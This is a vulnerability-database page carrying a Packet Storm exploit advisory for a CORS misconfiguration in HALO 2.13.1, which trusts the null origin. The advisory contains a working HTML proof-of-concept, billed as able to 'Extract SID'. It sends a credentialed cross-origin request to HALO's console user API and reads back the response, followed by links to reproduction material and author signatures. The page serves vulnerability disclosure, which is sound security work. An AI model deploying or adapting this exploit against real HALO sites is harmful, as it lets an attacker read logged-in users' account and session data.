Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormNu11secur1tyPACKETSTORM:177609
HistoryMar 15, 2024 - 12:00 a.m.

HALO 2.13.1 CORS Issue

2024-03-1500:00:00
nu11secur1ty
packetstormsecurity.com
104
cors policy implementation
arbitrary origin trust
html exploit
exploit impact

7.4 High

AI Score

Confidence

Low

JSON
`## Title: HALO-2.13.1 Cross-origin resource sharing: arbitrary origin trusted  
## Author: nu11secur1ty  
## Date: 03/15/2024  
## Vendor: https://www.halo.run/  
## Software: https://github.com/halo-dev/halo  
## Reference: https://portswigger.net/web-security/cors  
  
## Description:  
The application implements an HTML5 cross-origin resource sharing  
(CORS) policy for this request that allows access from any domain.  
The application allowed access from the requested origin null  
The application allows two-way interaction from the null origin. This  
effectively means that any domain can perform two-way interaction by  
causing the browser to submit the null origin, for example by issuing  
the request from a sandboxed iframe or malicious fishing domain with a  
specially crafted HTML exploit.  
  
STATUS: HIGH- Vulnerability  
  
[+]Exploit:  
```HTML  
<html>  
<body>  
<center>  
<h2>CORS POC Exploit  
<h3>Extract SID  
  
<div id="demo">  
<button type="button" onclick="cors()">Exploit Click here  
</div>  
  
<script>  
function cors() {  
var xhttp = new XMLHttpRequest();  
xhttp.onreadystatechange = function() {  
if (this.readyState == 4 && this.status == 200) {  
document.getElementById("demo").innerHTML = alert(this.responseText);  
}  
};  
xhttp.open("GET",  
"http://192.168.100.49:8090/apis/api.console.halo.run/v1alpha1/users/-",  
true);  
xhttp.withCredentials = true;  
xhttp.send();  
}  
</script>  
  
</body>  
</html>  
  
```  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/HALO/2024/HALO-2.13.1)  
  
## Proof and Exploit:  
[href](https://www.nu11secur1ty.com/2024/03/halo-2131-cross-origin-resource-sharing.html)  
  
## Time spent:  
00:25:00  
  
  
--   
System Administrator - Infrastructure Engineer  
Penetration Testing Engineer  
Exploit developer at https://packetstormsecurity.com/  
https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and  
https://www.exploit-db.com/  
0day Exploit DataBase https://0day.today/  
home page: https://www.nu11secur1ty.com/  
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=  
nu11secur1ty <http://nu11secur1ty.com/>  
  
  
--   
System Administrator - Infrastructure Engineer  
Penetration Testing Engineer  
Exploit developer at https://packetstormsecurity.com/  
https://cve.mitre.org/index.html  
https://cxsecurity.com/ and https://www.exploit-db.com/  
0day Exploit DataBase https://0day.today/  
home page: https://www.nu11secur1ty.com/  
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=  
nu11secur1ty <http://nu11secur1ty.com/>  
`

7.4 High

AI Score

Confidence

Low

JSON